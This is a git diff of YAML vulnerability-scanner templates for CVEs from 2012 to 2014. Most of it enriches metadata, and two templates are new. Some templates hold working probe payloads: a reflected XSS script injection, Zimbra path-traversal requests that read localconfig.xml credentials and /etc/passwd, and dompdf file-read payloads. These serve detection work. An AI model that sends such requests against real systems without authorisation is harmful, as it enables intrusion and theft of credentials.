+34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index 58679a3d38..ea6daf7459 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml @@ -1,12 +1,18 @@ id: CVE-2012-4940 info: - name: Axigen Mail Server - 'Filename' Directory Traversal + name: Axigen Mail Server Filename Directory Traversal author: dhiyaneshDk severity: high - description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI. - reference: https://www.exploit-db.com/exploits/37996 - tags: cve,cve2012,axigen,lfi + description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. + reference: + - https://www.exploit-db.com/exploits/37996 + - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 + - http://www.kb.cert.org/vuls/id/586556 + - http://www.securityfocus.com/bid/56343 + classification: + cve-id: CVE-2012-4940 + tags: cve,cve2012,axigen,lfi,mail requests: - method: GET @@ -22,4 +28,6 @@ requests: - "bit app support" - "fonts" - "extensions" - condition: and \ No newline at end of file + condition: and + +# Enhanced by cs on 2022/02/25 diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml index cdbbce256d..35eef6218f 100644 --- a/cves/2012/CVE-2012-5913.yaml +++ b/cves/2012/CVE-2012-5913.yaml @@ -1,11 +1,17 @@ id: CVE-2012-5913 info: - name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) + name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ + - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html + - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt + classification: + cve-id: CVE-2012-5913 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index e2e5f0a70c..a487bd900a 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml @@ -5,8 +5,14 @@ info: author: pikpikcu severity: critical description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. - reference: http://struts.apache.org/development/2.x/docs/s2-012.html - tags: cve,cve2013,apache,rce,struts + reference: + - http://struts.apache.org/development/2.x/docs/s2-012.html + - https://nvd.nist.gov/vuln/detail/CVE-2013-1965 + - https://bugzilla.redhat.com/show_bug.cgi?id=967655 + remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. + classification: + cve-id: CVE-2013-1965 + tags: cve,cve2013,apache,rce,struts,ognl requests: - method: POST @@ -22,8 +28,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml index eca8e3d253..bb7040e1d4 100644 --- a/cves/2013/CVE-2013-2248.yaml +++ b/cves/2013/CVE-2013-2248.yaml @@ -3,9 +3,16 @@ id: CVE-2013-2248 info: name: Apache Struts - Multiple Open Redirection Vulnerabilities author: 0x_Akoko - description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/38666 severity: low + description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + reference: + - https://www.exploit-db.com/exploits/38666 + - https://nvd.nist.gov/vuln/detail/CVE-2013-2248 + - https://cwiki.apache.org/confluence/display/WW/S2-017 + - http://struts.apache.org/release/2.3.x/docs/s2-017.html + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. + classification: + cve-id: CVE-2013-2248 tags: cve,cve2013,apache,redirect,struts requests: @@ -17,4 +24,6 @@ requests: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header \ No newline at end of file + part: header + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index 67158a4a69..a9c45c26ce 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -4,9 +4,15 @@ info: name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution author: exploitation,dwisiswant0,alex severity: critical - description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code. - reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html - tags: cve,cve2013,rce,struts,apache + description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. + reference: + - http://struts.apache.org/release/2.3.x/docs/s2-016.html + - https://cwiki.apache.org/confluence/display/WW/S2-016 + - https://nvd.nist.gov/vuln/detail/CVE-2013-2251 + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. + classification: + cve-id: CVE-2013-2251 + tags: cve,cve2013,rce,struts,apache,ognl requests: - raw: @@ -43,3 +49,5 @@ requests: part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 4b827a6e88..5d169d1e53 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml @@ -1,12 +1,17 @@ id: CVE-2013-2287 info: - name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + - http://osvdb.org/90840 + - https://www.dognaedis.com/vulns/DGS-SEC-16.html + classification: + cve-id: CVE-2013-2287 tags: cve,cve2013,wordpress,xss,wp-plugin - description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." requests: - method: GET @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index a65162e1be..2f271d0f3b 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml @@ -1,12 +1,18 @@ id: CVE-2013-3526 info: - name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html + - http://osvdb.org/92197 + - http://www.securityfocus.com/bid/58948 + classification: + cve-id: CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin - description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." requests: - method: GET @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index c9217eb4c9..17e8872b64 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -4,11 +4,15 @@ info: name: Javafaces LFI author: Random-Robbie severity: medium - description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. - tags: cve,cve2013,lfi,javafaces,oracle + description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://www.exploit-db.com/exploits/38802 + - https://www.oracle.com/security-alerts/cpuoct2013.html + - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html + classification: + cve-id: CVE-2013-3827 + tags: cve,cve2013,lfi,javafaces,oracle requests: - method: GET @@ -36,4 +40,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml index 2b2a102326..d2a93dc850 100644 --- a/cves/2013/CVE-2013-4117.yaml +++ b/cves/2013/CVE-2013-4117.yaml @@ -1,11 +1,17 @@ id: CVE-2013-4117 info: - name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + - http://openwall.com/lists/oss-security/2013/07/11/11 + - http://seclists.org/bugtraq/2013/Jul/17 + - http://osvdb.org/94805 + classification: + cve-id: CVE-2013-4117 tags: cve,cve2013,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml index e2184bc7a0..81f60cc764 100644 --- a/cves/2013/CVE-2013-4625.yaml +++ b/cves/2013/CVE-2013-4625.yaml @@ -1,11 +1,18 @@ id: CVE-2013-4625 info: - name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html + - http://osvdb.org/95627 + - http://archives.neohapsis.com/archives/bugtraq/2013-07/0161.html + remediation: Upgrade to Duplicator 0.4.5 or later. + classification: + cve-id: CVE-2013-4625 tags: cve,cve2013,wordpress,xss,wp-plugin requests: @@ -28,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-5528.yaml b/cves/2013/CVE-2013-5528.yaml index aae2a740e1..c6a9f04a15 100644 --- a/cves/2013/CVE-2013-5528.yaml +++ b/cves/2013/CVE-2013-5528.yaml @@ -4,8 +4,14 @@ info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 - reference: https://www.exploit-db.com/exploits/40887 + description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + reference: + - https://www.exploit-db.com/exploits/40887 + - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 + - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 + - http://www.securityfocus.com/bid/62960 + classification: + cve-id: CVE-2013-5528 tags: cve,cve2013,lfi,cisco requests: @@ -18,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-5979.yaml b/cves/2013/CVE-2013-5979.yaml index e3748feb78..7ad29aa3ce 100644 --- a/cves/2013/CVE-2013-5979.yaml +++ b/cves/2013/CVE-2013-5979.yaml @@ -4,11 +4,14 @@ info: name: Xibo 1.2.2/1.4.1 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. reference: - https://www.exploit-db.com/exploits/26955 + - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 - https://www.cvedetails.com/cve/CVE-2013-5979 - https://bugs.launchpad.net/xibo/+bug/1093967 + classification: + cve-id: CVE-2013-5979 tags: cve,cve2013,lfi requests: @@ -21,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-6281.yaml b/cves/2013/CVE-2013-6281.yaml new file mode 100644 index 0000000000..2abe056dcd --- /dev/null +++ b/cves/2013/CVE-2013-6281.yaml @@ -0,0 +1,46 @@ +id: CVE-2013-6281 + +info: + name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS + author: random-robbie + severity: medium + description: | + The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability. + reference: + - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf + - https://www.securityfocus.com/bid/63256/ + - https://wordpress.org/plugins/dhtmlxspreadsheet/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2013-6281 + cwe-id: CWE-79 + metadata: + google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet + verified: "true" + tags: cve,cve2013,wordpress,xss,wp-plugin,wp + +requests: + - raw: + - | + GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "page: ''" + - "dhx_rel_path" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2013/CVE-2013-7091.yaml b/cves/2013/CVE-2013-7091.yaml new file mode 100644 index 0000000000..ae2e8ddeea --- /dev/null +++ b/cves/2013/CVE-2013-7091.yaml @@ -0,0 +1,41 @@ +id: CVE-2013-7091 + +info: + name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion + author: rubina119 + severity: critical + description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 + - https://www.exploit-db.com/exploits/30085 + - https://www.exploit-db.com/exploits/30472 + - http://osvdb.org/100747 + classification: + cve-id: CVE-2013-7091 + tags: cve,cve2013,zimbra,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" + - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + words: + - "zimbra_server_hostname" + - "zimbra_ldap_userdn" + - "zimbra_ldap_password" + - "ldap_postfix_password" + - "ldap_amavis_password" + - "ldap_nginx_password" + - "mysql_root_password" + condition: or + + - type: regex + regex: + - "root=.*:0:0" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml index 2b8df419a9..6ad0335e9a 100644 --- a/cves/2013/CVE-2013-7240.yaml +++ b/cves/2013/CVE-2013-7240.yaml @@ -4,16 +4,18 @@ info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - tags: cve,cve2013,wordpress,wp-plugin,lfi + - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ + - http://seclists.org/oss-sec/2013/q4/570 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2013-7240 cwe-id: CWE-22 + tags: cve,cve2013,wordpress,wp-plugin,lfi requests: - method: GET @@ -34,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-10037.yaml b/cves/2014/CVE-2014-10037.yaml index 7acb0d68b5..35aa39b4b4 100644 --- a/cves/2014/CVE-2014-10037.yaml +++ b/cves/2014/CVE-2014-10037.yaml @@ -4,10 +4,14 @@ info: name: DomPHP 0.83 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. + description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. reference: - https://www.exploit-db.com/exploits/30865 - https://www.cvedetails.com/cve/CVE-2014-10037 + - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 + - http://osvdb.org/show/osvdb/102204 + classification: + cve-id: CVE-2014-10037 tags: cve,cve2014,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-2321.yaml b/cves/2014/CVE-2014-2321.yaml index c26212d1b8..7f328db084 100644 --- a/cves/2014/CVE-2014-2321.yaml +++ b/cves/2014/CVE-2014-2321.yaml @@ -2,12 +2,17 @@ id: CVE-2014-2321 info: name: ZTE Cable Modem Web Shell - description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. author: geeknik + severity: high + description: | + ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. reference: - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - severity: high + - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 + - http://www.kb.cert.org/vuls/id/600724 + classification: + cve-id: CVE-2014-2321 tags: iot,cve,cve2014,zte requests: @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml index 61d21ce54c..c813730817 100644 --- a/cves/2014/CVE-2014-2323.yaml +++ b/cves/2014/CVE-2014-2323.yaml @@ -1,17 +1,21 @@ id: CVE-2014-2323 info: - name: Lighttpd 1.4.34 SQL injection and path traversal - description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname. - reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt + name: Lighttpd 1.4.34 SQL Injection and Path Traversal author: geeknik severity: critical - tags: cve,cve2014,sqli,lighttpd + description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 + - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt + - http://www.lighttpd.net/2014/3/12/1.4.35/ + - http://seclists.org/oss-sec/2014/q1/561 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-2323 cwe-id: CWE-89 + tags: cve,cve2014,sqli,lighttpd,injection requests: - raw: @@ -24,3 +28,5 @@ requests: - type: regex regex: - "root:[x*]:0:0:" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index 1586860d75..bb404d9069 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml @@ -4,12 +4,18 @@ info: name: Arbitrary file read in dompdf < v0.6.0 author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/33004 - tags: cve,cve2014,dompdf,lfi + description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 + - https://www.exploit-db.com/exploits/33004 + - http://seclists.org/fulldisclosure/2014/Apr/258 + - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ + classification: + cve-id: CVE-2014-2383 metadata: - win-payload: "/dompdf.php?input_file=C:/windows/win.ini" - unix-payload: "/dompdf.php?input_file=/etc/passwd" - description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter." + unix-payload: /dompdf.php?input_file=/etc/passwd + win-payload: /dompdf.php?input_file=C:/windows/win.ini + tags: cve,cve2014,dompdf,lfi requests: - method: GET @@ -32,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-2908.yaml b/cves/2014/CVE-2014-2908.yaml index 2b589fa8fe..a7a471167d 100644 --- a/cves/2014/CVE-2014-2908.yaml +++ b/cves/2014/CVE-2014-2908.yaml @@ -4,10 +4,15 @@ info: name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. reference: - https://www.exploit-db.com/exploits/44687 + - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf - https://nvd.nist.gov/vuln/detail/CVE-2014-2908 + - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02 + remediation: Upgrade to v4.0 or later. + classification: + cve-id: CVE-2014-2908 tags: cve,cve2014,xss,siemens requests: @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2014/CVE-2014-2962.yaml b/cves/2014/CVE-2014-2962.yaml index c0b20521c0..2c2c67d121 100644 --- a/cves/2014/CVE-2014-2962.yaml +++ b/cves/2014/CVE-2014-2962.yaml @@ -1,12 +1,19 @@ id: CVE-2014-2962 info: - name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal + name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal author: daffainfo severity: high - description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - reference: https://www.exploit-db.com/exploits/38488 - tags: cve,cve2014,lfi,router + description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + reference: + - https://www.kb.cert.org/vuls/id/774788 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l + - http://www.kb.cert.org/vuls/id/774788 + - http://www.belkin.com/us/support-article?articleNum=109400 + remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. + classification: + cve-id: CVE-2014-2962 + tags: cve,cve2014,lfi,router,firmware,traversal requests: - method: GET @@ -18,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index a2bd566a60..437057bc90 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml @@ -5,11 +5,15 @@ info: author: pikpikcu severity: critical description: | - The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released - tags: cve,cve2014,elastic,rce + - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 + - http://bouk.co/blog/elasticsearch-rce/ + classification: + cve-id: CVE-2014-3120 + tags: cve,cve2014,elastic,rce,elasticsearch requests: - raw: @@ -46,9 +50,11 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-3206.yaml b/cves/2014/CVE-2014-3206.yaml new file mode 100644 index 0000000000..93e697d674 --- /dev/null +++ b/cves/2014/CVE-2014-3206.yaml @@ -0,0 +1,38 